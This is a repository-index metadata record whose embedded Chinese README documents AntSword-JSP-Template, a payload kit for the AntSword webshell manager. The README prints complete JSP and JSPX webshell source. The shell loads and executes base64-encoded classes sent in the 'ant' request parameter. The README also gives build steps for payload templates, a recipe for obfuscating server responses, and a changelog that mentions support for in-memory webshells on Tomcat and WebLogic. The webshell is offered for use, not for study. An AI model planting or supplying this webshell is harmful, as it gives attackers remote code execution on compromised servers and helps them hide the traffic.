{"id":19281244,"url":"https://github.com/antswordproject/antsword-jsp-template","last_synced_at":"2025-04-08T03:18:57.182Z","repository":{"id":38345303,"uuid":"290258348","full_name":"AntSwordProject/AntSword-JSP-Template","owner":"AntSwordProject","description":null,"archived":false,"fork":false,"pushed_at":"2024-09-22T13:16:55.000Z","size":484,"stargazers_count":197,"open_issues_count":1,"forks_count":26,"subscribers_count":5,"default_branch":"master","last_synced_at":"2025-03-28T10:05:50.787Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/AntSwordProject.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-08-25T15:53:19.000Z","updated_at":"2025-03-27T17:08:14.000Z","dependencies_parsed_at":"2024-12-04T08:03:28.594Z","dependency_job_id":"5f78b50d-6f57-4227-9737-dc863c6723af","html_url":"https://github.com/AntSwordProject/AntSword-JSP-Template","commit_stats":{"total_commits":32,"total_committers":5,"mean_commits":6.4,"dds":0.53125,"last_synced_commit":"6def23a0c5dd158c1de78ea479164731ab62240f"},"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AntSwordProject%2FAntSword-JSP-Template","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AntSwordProject%2FAntSword-JSP-Template/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AntSwordProject%2FAntSword-JSP-Template/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AntSwordProject%2FAntSword-JSP-Template/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/AntSwordProject","download_url":"https://codeload.github.com/AntSwordProject/AntSword-JSP-Template/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247767239,"owners_count":20992548,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-09T21:22:07.244Z","updated_at":"2025-04-08T03:18:57.154Z","avatar_url":"https://github.com/AntSwordProject.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"# AntSword-JSP-Template  v1.7\n\n中国蚁剑JSP一句话Payload\n\n详细介绍：https://yzddmr6.tk/posts/antsword-diy-3/\n\n编译环境：jdk1.5 \n\n适用范围：jdk\u003e=1.5\n\n## 编译\n\n### 手动编译\n\n* Windows\n\n```\njavac.exe Test.java\n\nbase64 -w 0 Test.class \u003e Test.txt\n```\n\n* Linux/Mac\n\n```bash\njavac Test.java\n\n# Linux\nbase64 -w 0 Test.class \u003e Test.txt\n\n# Mac\nbase64 -b 0 Test.class \u003e Test.txt\n```\n\n### 自动编译\n\n在build.py中替换你的javac路径后运行，即可在`./dist`目录下自动生成代码模板。\n\n```\n#python2\npython build.py\n\n#python3\npython3 build3.py\n```\n\n编译完成后将`./dist/`目录下所有文件拷贝至`antSword-master/source/core/jsp/template/`下即可\n\n## Shell\nshell.jsp\n\n```\n\u003c%!\n    class U extends ClassLoader {\n        U(ClassLoader c) {\n            super(c);\n        }\n        public Class g(byte[] b) {\n            return super.defineClass(b, 0, b.length);\n        }\n    }\n\n    public byte[] base64Decode(String str) throws Exception {\n      Class base64;\n      byte[] value = null;\n      try {\n        base64=Class.forName(\"sun.misc.BASE64Decoder\");\n        Object decoder = base64.newInstance();\n        value = (byte[])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] {String.class }).invoke(decoder, new Object[] { str });\n      } catch (Exception e) {\n        try {\n          base64=Class.forName(\"java.util.Base64\");\n          Object decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);\n          value = (byte[])decoder.getClass().getMethod(\"decode\", new Class[] { String.class }).invoke(decoder, new Object[] { str });\n        } catch (Exception ee) {}\n      }\n      return value;\n    }\n%\u003e\n\u003c%\n    String cls = request.getParameter(\"ant\");\n    if (cls != null) {\n        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});\n    }\n%\u003e\n```\n\nshell.jspx\n```\n\u003cjsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" version=\"1.2\"\u003e\n    \u003cjsp:declaration\u003e\n        class U extends ClassLoader {\n            U(ClassLoader c) {\n                super(c);\n            }\n            public Class g(byte[] b) {\n                return super.defineClass(b, 0, b.length);\n            }\n        }\n        public byte[] base64Decode(String str) throws Exception {\n            Class base64;\n            byte[] value = null;\n            try {\n                base64=Class.forName(\"sun.misc.BASE64Decoder\");\n                Object decoder = base64.newInstance();\n                value = (byte[])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] {String.class }).invoke(decoder, new Object[] { str });\n            } catch (Exception e) {\n                try {\n                    base64=Class.forName(\"java.util.Base64\");\n                    Object decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);\n                    value = (byte[])decoder.getClass().getMethod(\"decode\", new Class[] { String.class }).invoke(decoder, new Object[] { str });\n                } catch (Exception ee) {}\n            }\n            return value;\n        }\n    \u003c/jsp:declaration\u003e\n    \u003cjsp:scriptlet\u003e\n        String cls = request.getParameter(\"ant\");\n        if (cls != null) {\n            new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});\n        }\n    \u003c/jsp:scriptlet\u003e\n\u003c/jsp:root\u003e\n```\n其中\n\n`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});`\n\n可以替换为\n\n`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);`\n\n这种写法支持Tomcat/Weblogic，不支持如SpringBoot等不自带pageContext的容器。\n\n或者\n\n`new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(request);`\n\n这种写法支持Tomcat/SpringBoot/Weblogic等容器。原理是使用反射自动从request中提取出response，遇到比较特殊的容器可能会提取失败。\n\n后两种为不推荐的写法，可能会在未来移除。\n\n## 解码器\n\n以 Reverse 解码器为例说明：\n\n\u003e 该解码器的功能是将返回包的数据反转\n\n1. 编写 `AsoutputReverse.java` 内容如下:\n\n```java\npublic class AsoutputReverse {\n  String res;\n\n  public AsoutputReverse(String str) {\n    // 这里编写对 str 处理的逻辑, 最后将值传给 res\n    res = new StringBuffer(str).reverse().toString();\n  }\n\n  // 请保持 toString 方法, 不要修改内容\n  @Override\n  public String toString() {\n    return res;\n  }\n}\n```\n\n2. 编译，并获取 .class 文件 base64 后的内容\n\n```\n$ javac AsoutputReverse.java\n$ base64 -w 0 AsoutputReverse.class\n```\n\n3. 打开 AntSword 进入编码设置，创建「解码器」，内容如下:\n\n```\n/**\n * JSP::reverse 解码器\n */\n\n 'use strict';\n\n module.exports = {\n   asoutput: () =\u003e {\n     // 这里是你的 .class 文件的 base64 后的内容\n     return `yv66vgAAADMAHgoACAATBwAUCgACABUKAAIAFgoAAgAXCQAHABgHA...`;\n   },\n   decode_buff: (data) =\u003e {\n     // 这里是解返回包的逻辑\n     return Buffer.from(data).reverse();\n   }\n }\n```\n\n## 更新日志\n\n### v 1.7\n\n1. 修复mysql表名含有特殊字符时出错的问题\n2. 增加文件hash功能\n3. 支持Tomcat10，去掉对第三方库的依赖\n\n### v 1.6\n\n\n1. equals支持数组传参方式，兼容各种容器\n2. build.py中可以手动指定版本号编译，不再需要下载指定jdk\n3. 部分变量转为类属性，方便调试\n4. 修正 insert/update/delete 语句无法执行问题\n\n### v 1.5\n\n1. 支持解码器(返回包加密)\n2. 修复base64编码问题\u0026改正错别字\n3. 修改获取当前目录的方式\n4. 兼容 JDK 1.5\n\n### v 1.4\n\n1. 兼容JDK6\n2. 兼容weblogic内存webshell\n3. 优化报错信息\n4. 解决windows下中文乱码的问题（win选择GBK编码，linux选择UTF-8编码）\n5. 实战中只能获取到response的情况几乎没有，所以为了减少payload体积不再支持response作为入口参数\n6. 增加用于测试payload的Web项目\n7. 修复 java -jar xxx.war 启动时当前目录获取失败的问题\n\n\n### v 1.3\n\n1. 兼容SpringBoot\n\n### v 1.2\n\n1. 修复下载文件的BUG\n2. database添加Base64编码\n\n### v 1.1\n\n1. 增加对Tomcat内存Webshell的兼容\n2. 兼容高版本JDK（JDK7-14）\n\n### v 1.0\n\n1. release\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantswordproject%2Fantsword-jsp-template","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fantswordproject%2Fantsword-jsp-template","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fantswordproject%2Fantsword-jsp-template/lists"}